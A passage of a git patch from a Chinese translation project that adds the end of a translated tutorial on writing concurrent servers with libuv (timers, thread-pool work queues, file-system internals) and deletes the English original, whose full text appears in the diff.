timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +它用一个单个注册的回调运行一个 libuv 事件循环:`on_timer`,它被每秒钟循环调用一次。回调报告一个时间戳,并且,偶尔通过睡眠 3 秒去模拟一个长周期运行。这是运行示例: + +``` +$ ./uv-timer-sleep-demo +on_timer [4840 ms] +on_timer [5842 ms] +on_timer [6843 ms] +on_timer [7844 ms] +Sleeping... +on_timer [11845 ms] +on_timer [12846 ms] +Sleeping... +on_timer [16847 ms] +on_timer [17849 ms] +on_timer [18850 ms] +... +``` + +`on_timer` 忠实地每秒执行一次,直到随机出现的睡眠为止。在那个时间点,`on_timer` 不再被调用,直到睡眠时间结束;事实上,_没有其它的回调_  在这个时间帧中被调用。这个睡眠调用阻塞当前线程,它正是被调用的线程,并且也是事件循环使用的线程。当这个线程被阻塞后,事件循环也被阻塞。 + +这个示例演示了在事件驱动的调用中为什么回调不能被阻塞是多少的重要。并且,同样适用于 Node.js 服务器、客户端侧的 Javascript、大多数的 GUI 编程框架、以及许多其它的异步编程模型。 + +但是,有时候运行耗时的任务是不可避免的。并不是所有任务都有一个异步 APIs;例如,我们可能使用一些仅有同步 API 的库去处理,或者,正在执行一个可能的长周期计算。我们如何用事件驱动编程去结合这些代码?线程可以帮到你! + +### “转换” 阻塞调用到异步调用的线程 + +一个线程池可以被用于去转换阻塞调用到异步调用,通过与事件循环并行运行,并且当任务完成时去由它去公布事件。一个给定的阻塞函数 `do_work()`,这里介绍了它是怎么运行的: + +1. 在一个回调中,用 `do_work()` 代表直接调用,我们将它打包进一个 “任务”,并且请求线程池去运行这个任务。当任务完成时,我们也为循环去调用它注册一个回调;我们称它为 `on_work_done()`。 + +2. 在这个时间点,我们的回调可以返回并且事件循环保持运行;在同一时间点,线程池中的一个线程运行这个任务。 + +3. 一旦任务运行完成,通知主线程(指正在运行事件循环的线程),并且,通过事件循环调用 `on_work_done()`。 + +让我们看一下,使用 libuv 的工作调度 API,是怎么去解决我们前面的 timer/sleep 示例中展示的问题的: + +``` +void on_after_work(uv_work_t* req, int status) { + free(req); +} + +void on_work(uv_work_t* req) { + // "Work" + if (random() % 5 == 0) { + printf("Sleeping...\n"); + sleep(3); + } +} + +void on_timer(uv_timer_t* timer) { + uint64_t timestamp = uv_hrtime(); + printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); + + uv_work_t* work_req = (uv_work_t*)malloc(sizeof(*work_req)); + uv_queue_work(uv_default_loop(), work_req, on_work, on_after_work); +} + +int main(int argc, const char** argv) { + uv_timer_t timer; + uv_timer_init(uv_default_loop(), &timer); + uv_timer_start(&timer, on_timer, 0, 1000); + return uv_run(uv_default_loop(), UV_RUN_DEFAULT); +} +``` + +通过一个 work_req [[2]][14] 类型的句柄,我们进入一个任务队列,代替在 `on_timer` 上直接调用 sleep,这个函数在任务中(`on_work`)运行,并且,一旦任务完成(`on_after_work`),这个函数被调用一次。`on_work` 在这里是指发生的 “work”(阻塞中的/耗时的操作)。在这两个回调传递到 `uv_queue_work` 时,注意一个关键的区别:`on_work` 运行在线程池中,而 `on_after_work` 运行在事件循环中的主线程上 - 就好像是其它的回调一样。 + +让我们看一下这种方式的运行: + +``` +$ ./uv-timer-work-demo +on_timer [89571 ms] +on_timer [90572 ms] +on_timer [91573 ms] +on_timer [92575 ms] +Sleeping... +on_timer [93576 ms] +on_timer [94577 ms] +Sleeping... +on_timer [95577 ms] +on_timer [96578 ms] +on_timer [97578 ms] +... +``` + +即便在 sleep 函数被调用时,定时器也每秒钟滴答一下,睡眠(sleeping)现在运行在一个单独的线程中,并且不会阻塞事件循环。 + +### 一个用于练习的素数测试服务器 + +因为通过睡眼去模拟工作并不是件让人兴奋的事,我有一个事先准备好的更综合的一个示例 - 一个基于套接字接受来自客户端的数字的服务器,检查这个数字是否是素数,然后去返回一个 “prime" 或者 “composite”。完整的 [服务器代码在这里][15] - 我不在这里粘贴了,因为它太长了,更希望读者在一些自己的练习中去体会它。 + +这个服务器使用了一个原生的素数测试算法,因此,对于大的素数可能花很长时间才返回一个回答。在我的机器中,对于 2305843009213693951,它花了 ~5 秒钟去计算,但是,你的方法可能不同。 + +练习 1:服务器有一个设置(通过一个名为 MODE 的环境变量)要么去在套接字回调(意味着在主线程上)中运行素数测试,要么在 libuv 工作队列中。当多个客户端同时连接时,使用这个设置来观察服务器的行为。当它计算一个大的任务时,在阻塞模式中,服务器将不回复其它客户端,而在非阻塞模式中,它会回复。 + +练习 2;libuv 有一个缺省大小的线程池,并且线程池的大小可以通过环境变量配置。你可以通过使用多个客户端去实验找出它的缺省值是多少?找到线程池缺省值后,使用不同的设置去看一下,在重负载下怎么去影响服务器的响应能力。 + +### 在非阻塞文件系统中使用工作队列 + +对于仅傻傻的演示和 CPU 密集型的计算来说,将可能的阻塞操作委托给一个线程池并不是明智的;libuv 在它的文件系统 APIs 中本身就大量使用了这种性能。通过这种方式,libuv 使用一个异步 API,在一个轻便的方式中,显示出它强大的文件系统的处理能力。 + +让我们使用 `uv_fs_read()`,例如,这个函数从一个文件中(以一个 `uv_fs_t` 句柄为代表)读取一个文件到一个缓冲中 [[3]][16],并且当读取完成后调用一个回调。换句话说,`uv_fs_read()` 总是立即返回,甚至如果文件在一个类似 NFS 的系统上,并且,数据到达缓冲区可能需要一些时间。换句话说,这个 API 与这种方式中其它的 libuv APIs 是异步的。这是怎么工作的呢? + +在这一点上,我们看一下 libuv 的底层;内部实际上非常简单,并且它是一个很好的练习。作为一个便携的库,libuv 对于 Windows 和 Unix 系统在它的许多函数上有不同的实现。我们去看一下在 libuv 源树中的 src/unix/fs.c。 + +这是 `uv_fs_read` 的代码: + +``` +int uv_fs_read(uv_loop_t* loop, uv_fs_t* req, + uv_file file, + const uv_buf_t bufs[], + unsigned int nbufs, + int64_t off, + uv_fs_cb cb) { + if (bufs == NULL || nbufs == 0) + return -EINVAL; + + INIT(READ); + req->file = file; + + req->nbufs = nbufs; + req->bufs = req->bufsml; + if (nbufs > ARRAY_SIZE(req->bufsml)) + req->bufs = uv__malloc(nbufs * sizeof(*bufs)); + + if (req->bufs == NULL) { + if (cb != NULL) + uv__req_unregister(loop, req); + return -ENOMEM; + } + + memcpy(req->bufs, bufs, nbufs * sizeof(*bufs)); + + req->off = off; + POST; +} +``` + +第一次看可能觉得很困难,因为它延缓真实的工作到 INIT 和 POST 宏中,在 POST 中与一些本地变量一起设置。这样做可以避免了文件中的许多重复代码。 + +这是 INIT 宏: + +``` +#define INIT(subtype) \ + do { \ + req->type = UV_FS; \ + if (cb != NULL) \ + uv__req_init(loop, req, UV_FS); \ + req->fs_type = UV_FS_ ## subtype; \ + req->result = 0; \ + req->ptr = NULL; \ + req->loop = loop; \ + req->path = NULL; \ + req->new_path = NULL; \ + req->cb = cb; \ + } \ + while (0) +``` + +它设置了请求,并且更重要的是,设置 `req->fs_type` 域为真实的 FS 请求类型。因为 `uv_fs_read` 调用 invokes INIT(READ),它意味着 `req->fs_type` 被分配一个常数 `UV_FS_READ`。 + +这是 POST 宏: + +``` +#define POST \ + do { \ + if (cb != NULL) { \ + uv__work_submit(loop, &req->work_req, uv__fs_work, uv__fs_done); \ + return 0; \ + } \ + else { \ + uv__fs_work(&req->work_req); \ + return req->result; \ + } \ + } \ + while (0) +``` + +它做什么取决于回调是否为 NULL。在 libuv 文件系统 APIs 中,一个 NULL 回调意味着我们真实地希望去执行一个 _同步_ 操作。在这种情况下,POST 直接调用 `uv__fs_work`(我们需要了解一下这个函数的功能),而对于一个 non-NULL 回调,它提交 `uv__fs_work` 作为一个工作事项到工作队列(指的是线程池),然后,注册 `uv__fs_done` 作为回调;该函数执行一些登记并调用用户提供的回调。 + +如果我们去看 `uv__fs_work` 的代码,我们将看到它使用很多宏去按需路由工作到真实的文件系统调用。在我们的案例中,对于 `UV_FS_READ` 这个调用将被 `uv__fs_read` 生成,它(最终)使用普通的 POSIX APIs 去读取。这个函数可以在一个 _阻塞_ 方式中很安全地实现。因为,它通过异步 API 调用时被置于一个线程池中。 + +在 Node.js 中,fs.readFile 函数是映射到 `uv_fs_read` 上。因此,可以在一个非阻塞模式中读取文件,甚至是当底层文件系统 API 是阻塞方式时。 + +* * * + + +[[1]][1] 为确保服务器不泄露内存,我在一个启用泄露检查的 Valgrind 中运行它。因为服务器经常是被设计为永久运行,这是一个挑战;为克服这个问题,我在服务器上添加了一个 “kill 开关” - 一个从客户端接收的特定序列,以使它可以停止事件循环并退出。这个代码在 `theon_wrote_buf` 句柄中。 + + +[[2]][2] 在这里我们不过多地使用 `work_req`;讨论的素数测试服务器接下来将展示怎么被用于去传递上下文信息到回调中。 + + +[[3]][3] `uv_fs_read()` 提供了一个类似于 preadv Linux 系统调用的通用 API:它使用多缓冲区用于排序,并且支持一个到文件中的偏移。基于我们讨论的目的可以忽略这些特性。 + + +-------------------------------------------------------------------------------- + +via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ + +作者:[Eli Bendersky ][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://eli.thegreenplace.net/ +[1]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id1 +[2]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id2 +[3]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id3 +[4]:https://eli.thegreenplace.net/tag/concurrency +[5]:https://eli.thegreenplace.net/tag/c-c +[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4 +[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ +[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ +[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ +[12]:http://libuv.org/ +[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c +[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5 +[15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c +[16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 +[17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ From 3142dd94f1a309a240da88dc66e3b16321722f0d Mon Sep 17 00:00:00 2001 From: qhwdw Date: Mon, 4 Dec 2017 15:38:10 +0800 Subject: [PATCH 0260/1627] Translated by qhwdw --- ...1109 Concurrent Servers- Part 4 - libuv.md | 492 ------------------ ...1109 Concurrent Servers- Part 4 - libuv.md | 1 + 2 files changed, 1 insertion(+), 492 deletions(-) delete mode 100644 sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md diff --git a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md deleted file mode 100644 index 94b98cf5c2..0000000000 --- a/sources/tech/20171109 Concurrent Servers- Part 4 - libuv.md +++ /dev/null @@ -1,492 +0,0 @@ -Translating by qhwdw [Concurrent Servers: Part 4 - libuv][17] -============================================================ - -This is part 4 of a series of posts on writing concurrent network servers. In this part we're going to use libuv to rewrite our server once again, and also talk about handling time-consuming tasks in callbacks using a thread pool. Finally, we're going to look under the hood of libuv for a bit to study how it wraps blocking file-system operations with an asynchronous API. - -All posts in the series: - -* [Part 1 - Introduction][7] - -* [Part 2 - Threads][8] - -* [Part 3 - Event-driven][9] - -* [Part 4 - libuv][10] - -### Abstracting away event-driven loops with libuv - -In [part 3][11], we've seen how similar select-based and epoll-based servers are, and I mentioned it's very tempting to abstract away the minor differences between them. Numerous libraries are already doing this, however, so in this part I'm going to pick one and use it. The library I'm picking is [libuv][12], which was originally designed to serve as the underlying portable platform layer for Node.js, and has since found use in additional projects. libuv is written in C, which makes it highly portable and very suitable for tying into high-level languages like JavaScript and Python. - -While libuv has grown to be a fairly large framework for abstracting low-level platform details, it remains centered on the concept of an  _event loop_ . In our event-driven servers in part 3, the event loop was explicit in the main function; when using libuv, the loop is usually hidden inside the library itself, and user code just registers event handlers (as callback functions) and runs the loop. Furthermore, libuv will use the fastest event loop implementation for a given platform: for Linux this is epoll, etc. - -![libuv loop](https://eli.thegreenplace.net/images/2017/libuvloop.png) - -libuv supports multiple event loops, and thus an event loop is a first class citizen within the library; it has a handle - uv_loop_t, and functions for creating/destroying/starting/stopping loops. That said, I will only use the "default" loop in this post, which libuv makes available via uv_default_loop(); multiple loops are mosly useful for multi-threaded event-driven servers, a more advanced topic I'll leave for future parts in the series. - -### A concurrent server using libuv - -To get a better feel for libuv, let's jump to our trusty protocol server that we've been vigorously reimplementing throughout the series. The structure of this server is going to be somewhat similar to the select and epoll-based servers of part 3, since it also relies on callbacks. The full [code sample is here][13]; we start with setting up the server socket bound to a local port: - -``` -int portnum = 9090; -if (argc >= 2) { - portnum = atoi(argv[1]); -} -printf("Serving on port %d\n", portnum); - -int rc; -uv_tcp_t server_stream; -if ((rc = uv_tcp_init(uv_default_loop(), &server_stream)) < 0) { - die("uv_tcp_init failed: %s", uv_strerror(rc)); -} - -struct sockaddr_in server_address; -if ((rc = uv_ip4_addr("0.0.0.0", portnum, &server_address)) < 0) { - die("uv_ip4_addr failed: %s", uv_strerror(rc)); -} - -if ((rc = uv_tcp_bind(&server_stream, (const struct sockaddr*)&server_address, 0)) < 0) { - die("uv_tcp_bind failed: %s", uv_strerror(rc)); -} -``` - -Fairly standard socket fare here, except that it's all wrapped in libuv APIs. In return we get a portable interface that should work on any platform libuv supports. - -This code also demonstrates conscientious error handling; most libuv functions return an integer status, with a negative number meaning an error. In our server we treat these errors as fatals, but one may imagine a more graceful recovery. - -Now that the socket is bound, it's time to listen on it. Here we run into our first callback registration: - -``` -// Listen on the socket for new peers to connect. When a new peer connects, -// the on_peer_connected callback will be invoked. -if ((rc = uv_listen((uv_stream_t*)&server_stream, N_BACKLOG, on_peer_connected)) < 0) { - die("uv_listen failed: %s", uv_strerror(rc)); -} -``` - -uv_listen registers a callback that the event loop will invoke when new peers connect to the socket. Our callback here is called on_peer_connected, and we'll examine it soon. - -Finally, main runs the libuv loop until it's stopped (uv_run only returns when the loop has stopped or some error occurred). - -``` -// Run the libuv event loop. -uv_run(uv_default_loop(), UV_RUN_DEFAULT); - -// If uv_run returned, close the default loop before exiting. -return uv_loop_close(uv_default_loop()); -``` - -Note that only a single callback was registered by main prior to running the event loop; we'll soon see how additional callbacks are added. It's not a problem to add and remove callbacks throughout the runtime of the event loop - in fact, this is how most servers are expected to be written. - -This is on_peer_connected, which handles new client connections to the server: - -``` -void on_peer_connected(uv_stream_t* server_stream, int status) { - if (status < 0) { - fprintf(stderr, "Peer connection error: %s\n", uv_strerror(status)); - return; - } - - // client will represent this peer; it's allocated on the heap and only - // released when the client disconnects. The client holds a pointer to - // peer_state_t in its data field; this peer state tracks the protocol state - // with this client throughout interaction. - uv_tcp_t* client = (uv_tcp_t*)xmalloc(sizeof(*client)); - int rc; - if ((rc = uv_tcp_init(uv_default_loop(), client)) < 0) { - die("uv_tcp_init failed: %s", uv_strerror(rc)); - } - client->data = NULL; - - if (uv_accept(server_stream, (uv_stream_t*)client) == 0) { - struct sockaddr_storage peername; - int namelen = sizeof(peername); - if ((rc = uv_tcp_getpeername(client, (struct sockaddr*)&peername, - &namelen)) < 0) { - die("uv_tcp_getpeername failed: %s", uv_strerror(rc)); - } - report_peer_connected((const struct sockaddr_in*)&peername, namelen); - - // Initialize the peer state for a new client: we start by sending the peer - // the initial '*' ack. - peer_state_t* peerstate = (peer_state_t*)xmalloc(sizeof(*peerstate)); - peerstate->state = INITIAL_ACK; - peerstate->sendbuf[0] = '*'; - peerstate->sendbuf_end = 1; - peerstate->client = client; - client->data = peerstate; - - // Enqueue the write request to send the ack; when it's done, - // on_wrote_init_ack will be called. The peer state is passed to the write - // request via the data pointer; the write request does not own this peer - // state - it's owned by the client handle. - uv_buf_t writebuf = uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); - uv_write_t* req = (uv_write_t*)xmalloc(sizeof(*req)); - req->data = peerstate; - if ((rc = uv_write(req, (uv_stream_t*)client, &writebuf, 1, - on_wrote_init_ack)) < 0) { - die("uv_write failed: %s", uv_strerror(rc)); - } - } else { - uv_close((uv_handle_t*)client, on_client_closed); - } -} -``` - -This code is well commented, but there are a couple of important libuv idioms I'd like to highlight: - -* Passing custom data into callbacks: since C has no closures, this can be challenging. libuv has a void* datafield in all its handle types; these fields can be used to pass user data. For example, note how client->data is made to point to a peer_state_t structure so that the callbacks registered by uv_write and uv_read_start can know which peer data they're dealing with. - -* Memory management: event-driven programming is much easier in languages with garbage collection, because callbacks usually run in a completely different stack frame from where they were registered, making stack-based memory management difficult. It's almost always necessary to pass heap-allocated data to libuv callbacks (except in main, which remains alive on the stack when all callbacks run), and to avoid leaks much care is required about when these data are safe to free(). This is something that comes with a bit of practice [[1]][6]. - -The peer state for this server is: - -``` -typedef struct { - ProcessingState state; - char sendbuf[SENDBUF_SIZE]; - int sendbuf_end; - uv_tcp_t* client; -} peer_state_t; -``` - -It's fairly similar to the state in part 3; we no longer need sendptr, since uv_write will make sure to send the whole buffer it's given before invoking the "done writing" callback. We also keep a pointer to the client for other callbacks to use. Here's on_wrote_init_ack: - -``` -void on_wrote_init_ack(uv_write_t* req, int status) { - if (status) { - die("Write error: %s\n", uv_strerror(status)); - } - peer_state_t* peerstate = (peer_state_t*)req->data; - // Flip the peer state to WAIT_FOR_MSG, and start listening for incoming data - // from this peer. - peerstate->state = WAIT_FOR_MSG; - peerstate->sendbuf_end = 0; - - int rc; - if ((rc = uv_read_start((uv_stream_t*)peerstate->client, on_alloc_buffer, - on_peer_read)) < 0) { - die("uv_read_start failed: %s", uv_strerror(rc)); - } - - // Note: the write request doesn't own the peer state, hence we only free the - // request itself, not the state. - free(req); -} -``` - -Then we know for sure that the initial '*' was sent to the peer, we start listening to incoming data from this peer by calling uv_read_start, which registers a callback (on_peer_read) that will be invoked by the event loop whenever new data is received on the socket from the client: - -``` -void on_peer_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) { - if (nread < 0) { - if (nread != uv_eof) { - fprintf(stderr, "read error: %s\n", uv_strerror(nread)); - } - uv_close((uv_handle_t*)client, on_client_closed); - } else if (nread == 0) { - // from the documentation of uv_read_cb: nread might be 0, which does not - // indicate an error or eof. this is equivalent to eagain or ewouldblock - // under read(2). - } else { - // nread > 0 - assert(buf->len >= nread); - - peer_state_t* peerstate = (peer_state_t*)client->data; - if (peerstate->state == initial_ack) { - // if the initial ack hasn't been sent for some reason, ignore whatever - // the client sends in. - free(buf->base); - return; - } - - // run the protocol state machine. - for (int i = 0; i < nread; ++i) { - switch (peerstate->state) { - case initial_ack: - assert(0 && "can't reach here"); - break; - case wait_for_msg: - if (buf->base[i] == '^') { - peerstate->state = in_msg; - } - break; - case in_msg: - if (buf->base[i] == '$') { - peerstate->state = wait_for_msg; - } else { - assert(peerstate->sendbuf_end < sendbuf_size); - peerstate->sendbuf[peerstate->sendbuf_end++] = buf->base[i] + 1; - } - break; - } - } - - if (peerstate->sendbuf_end > 0) { - // we have data to send. the write buffer will point to the buffer stored - // in the peer state for this client. - uv_buf_t writebuf = - uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); - uv_write_t* writereq = (uv_write_t*)xmalloc(sizeof(*writereq)); - writereq->data = peerstate; - int rc; - if ((rc = uv_write(writereq, (uv_stream_t*)client, &writebuf, 1, - on_wrote_buf)) < 0) { - die("uv_write failed: %s", uv_strerror(rc)); - } - } - } - free(buf->base); -} -``` - -The runtime behavior of this server is very similar to the event-driven servers of part 3: all clients are handled concurrently in a single thread. Also similarly, a certain discipline has to be maintained in the server's code: the server's logic is implemented as an ensemble of callbacks, and long-running operations are a big no-no since they block the event loop. Let's explore this issue a bit further. - -### Long-running operations in event-driven loops - -The single-threaded nature of event-driven code makes it very susceptible to a common issue: long-running code blocks the entire loop. Consider this program: - -``` -void on_timer(uv_timer_t* timer) { - uint64_t timestamp = uv_hrtime(); - printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); - - // "Work" - if (random() % 5 == 0) { - printf("Sleeping...\n"); - sleep(3); - } -} - -int main(int argc, const char** argv) { - uv_timer_t timer; - uv_timer_init(uv_default_loop(), &timer); - uv_timer_start(&timer, on_timer, 0, 1000); - return uv_run(uv_default_loop(), UV_RUN_DEFAULT); -} -``` - -It runs a libuv event loop with a single registered callback: on_timer, which is invoked by the loop every second. The callback reports a timestamp, and once in a while simulates some long-running task by sleeping for 3 seconds. Here's a sample run: - -``` -$ ./uv-timer-sleep-demo -on_timer [4840 ms] -on_timer [5842 ms] -on_timer [6843 ms] -on_timer [7844 ms] -Sleeping... -on_timer [11845 ms] -on_timer [12846 ms] -Sleeping... -on_timer [16847 ms] -on_timer [17849 ms] -on_timer [18850 ms] -... -``` - -on_timer dutifully fires every second, until the random sleep hits in. At that point, on_timer is not invoked again until the sleep is over; in fact,  _no other callbacks_  will be invoked in this time frame. The sleep call blocks the current thread, which is the only thread involved and is also the thread the event loop uses. When this thread is blocked, the event loop is blocked. - -This example demonstrates why it's so important for callbacks to never block in event-driven calls, and applies equally to Node.js servers, client-side Javascript, most GUI programming frameworks, and many other asynchronous programming models. - -But sometimes running time-consuming tasks is unavoidable. Not all tasks have asynchronous APIs; for example, we may be dealing with some library that only has a synchronous API, or just have to perform a potentially long computation. How can we combine such code with event-driven programming? Threads to the rescue! - -### Threads for "converting" blocking calls into asynchronous calls - -A thread pool can be used to turn blocking calls into asynchronous calls, by running alongside the event loop and posting events onto it when tasks are completed. Here's how it works, for a given blocking function do_work(): - -1. Instead of directly calling do_work() in a callback, we package it into a "task" and ask the thread pool to execute the task. We also register a callback for the loop to invoke when the task has finished; let's call iton_work_done(). - -2. At this point our callback can return and the event loop keeps spinning; at the same time, a thread in the pool is executing the task. - -3. Once the task has finished executing, the main thread (the one running the event loop) is notified and on_work_done() is invoked by the event loop. - -Let's see how this solves our previous timer/sleep example, using libuv's work scheduling API: - -``` -void on_after_work(uv_work_t* req, int status) { - free(req); -} - -void on_work(uv_work_t* req) { - // "Work" - if (random() % 5 == 0) { - printf("Sleeping...\n"); - sleep(3); - } -} - -void on_timer(uv_timer_t* timer) { - uint64_t timestamp = uv_hrtime(); - printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); - - uv_work_t* work_req = (uv_work_t*)malloc(sizeof(*work_req)); - uv_queue_work(uv_default_loop(), work_req, on_work, on_after_work); -} - -int main(int argc, const char** argv) { - uv_timer_t timer; - uv_timer_init(uv_default_loop(), &timer); - uv_timer_start(&timer, on_timer, 0, 1000); - return uv_run(uv_default_loop(), UV_RUN_DEFAULT); -} -``` - -Instead of calling sleep directly in on_timer, we enqueue a task, represented by a handle of type work_req [[2]][14], the function to run in the task (on_work) and the function to invoke once the task is completed (on_after_work). on_workis where the "work" (the blocking/time-consuming operation) happens. Note a crucial difference between the two callbacks passed into uv_queue_work: on_work runs in the thread pool, while on_after_work runs on the main thread which also runs the event loop - just like any other callback. - -Let's see this version run: - -``` -$ ./uv-timer-work-demo -on_timer [89571 ms] -on_timer [90572 ms] -on_timer [91573 ms] -on_timer [92575 ms] -Sleeping... -on_timer [93576 ms] -on_timer [94577 ms] -Sleeping... -on_timer [95577 ms] -on_timer [96578 ms] -on_timer [97578 ms] -... -``` - -The timer ticks every second, even though the sleeping function is still invoked; sleeping is now done on a separate thread and doesn't block the event loop. - -### A primality-testing server, with exercises - -Since sleep isn't a very exciting way to simulate work, I've prepared a more comprehensive example - a server that accepts numbers from clients over a socket, checks whether these numbers are prime and sends back either "prime" or "composite". The full [code for this server is here][15] - I won't post it here since it's long, but will rather give readers the opportunity to explore it on their own with a couple of exercises. - -The server deliberatly uses a naive primality test algorithm, so for large primes it can take quite a while to return an answer. On my machine it takes ~5 seconds to compute the answer for 2305843009213693951, but YMMV. - -Exercise 1: the server has a setting (via an environment variable named MODE) to either run the primality test in the socket callback (meaning on the main thread) or in the libuv work queue. Play with this setting to observe the server's behavior when multiple clients are connecting simultaneously. In blocking mode, the server will not answer other clients while it's computing a big task; in non-blocking mode it will. - -Exercise 2: libuv has a default thread-pool size, and it can be configured via an environment variable. Can you use multiple clients to discover experimentally what the default size is? Having found the default thread-pool size, play with different settings to see how it affects the server's responsiveness under heavy load. - -### Non-blocking file-system operations using work queues - -Delegating potentially-blocking operations to a thread pool isn't good for just silly demos and CPU-intensive computations; libuv itself makes heavy use of this capability in its file-system APIs. This way, libuv accomplishes the superpower of exposing the file-system with an asynchronous API, in a portable way. - -Let's take uv_fs_read(), for example. This function reads from a file (represented by a uv_fs_t handle) into a buffer [[3]][16], and invokes a callback when the reading is completed. That is, uv_fs_read() always returns immediately, even if the file sits on an NFS-like system and it may take a while for the data to get to the buffer. In other words, this API is asynchronous in the way other libuv APIs are. How does this work? - -At this point we're going to look under the hood of libuv; the internals are actually fairly straightforward, and it's a good exercise. Being a portable library, libuv has different implementations of many of its functions for Windows and Unix systems. We're going to be looking at src/unix/fs.c in the libuv source tree. - -The code for uv_fs_read is: - -``` -int uv_fs_read(uv_loop_t* loop, uv_fs_t* req, - uv_file file, - const uv_buf_t bufs[], - unsigned int nbufs, - int64_t off, - uv_fs_cb cb) { - if (bufs == NULL || nbufs == 0) - return -EINVAL; - - INIT(READ); - req->file = file; - - req->nbufs = nbufs; - req->bufs = req->bufsml; - if (nbufs > ARRAY_SIZE(req->bufsml)) - req->bufs = uv__malloc(nbufs * sizeof(*bufs)); - - if (req->bufs == NULL) { - if (cb != NULL) - uv__req_unregister(loop, req); - return -ENOMEM; - } - - memcpy(req->bufs, bufs, nbufs * sizeof(*bufs)); - - req->off = off; - POST; -} -``` - -It may seem puzzling at first, because it defers the real work to the INIT and POST macros, with some local variable setup for POST. This is done to avoid too much code duplication within the file. - -The INIT macro is: - -``` -#define INIT(subtype) \ - do { \ - req->type = UV_FS; \ - if (cb != NULL) \ - uv__req_init(loop, req, UV_FS); \ - req->fs_type = UV_FS_ ## subtype; \ - req->result = 0; \ - req->ptr = NULL; \ - req->loop = loop; \ - req->path = NULL; \ - req->new_path = NULL; \ - req->cb = cb; \ - } \ - while (0) -``` - -It sets up the request, and most importantly sets the req->fs_type field to the actual FS request type. Since uv_fs_read invokes INIT(READ), it means req->fs_type gets assigned the constant UV_FS_READ. - -The POST macro is: - -``` -#define POST \ - do { \ - if (cb != NULL) { \ - uv__work_submit(loop, &req->work_req, uv__fs_work, uv__fs_done); \ - return 0; \ - } \ - else { \ - uv__fs_work(&req->work_req); \ - return req->result; \ - } \ - } \ - while (0) -``` - -What it does depends on whether the callback is NULL. In libuv file-system APIs, a NULL callback means we actually want to perform the operation  _synchronously_ . In this case POST invokes uv__fs_work directly (we'll get to what this function does in just a bit), whereas for a non-NULL callback, it submits uv__fs_work as a work item to the work queue (which is the thread pool), and registers uv__fs_done as the callback; that function does a bit of book-keeping and invokes the user-provided callback. - -If we look at the code of uv__fs_work, we'll see it uses more macros to route work to the actual file-system call as needed. In our case, for UV_FS_READ the call will be made to uv__fs_read, which (at last!) does the reading using regular POSIX APIs. This function can be safely implemented in a  _blocking_  manner, since it's placed on a thread-pool when called through the asynchronous API. - -In Node.js, the fs.readFile function is mapped to uv_fs_read. Thus, reading files can be done in a non-blocking fashion even though the underlying file-system API is blocking. - -* * * - - -[[1]][1] To ensure that this server doesn't leak memory, I ran it under Valgrind with the leak checker enabled. Since servers are often designed to run forever, this was a bit challenging; to overcome this issue I've added a "kill switch" to the server - a special sequence received from a client makes it stop the event loop and exit. The code for this is in theon_wrote_buf handler. - - -[[2]][2] Here we don't use work_req for much; the primality testing server discussed next will show how it's used to pass context information into the callback. - - -[[3]][3] uv_fs_read() provides a generalized API similar to the preadv Linux system call: it takes multiple buffers which it fills in order, and supports an offset into the file. We can ignore these features for the sake of our discussion. - - --------------------------------------------------------------------------------- - -via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ - -作者:[Eli Bendersky ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://eli.thegreenplace.net/ -[1]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id1 -[2]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id2 -[3]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id3 -[4]:https://eli.thegreenplace.net/tag/concurrency -[5]:https://eli.thegreenplace.net/tag/c-c -[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4 -[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ -[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ -[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ -[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ -[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ -[12]:http://libuv.org/ -[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c -[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5 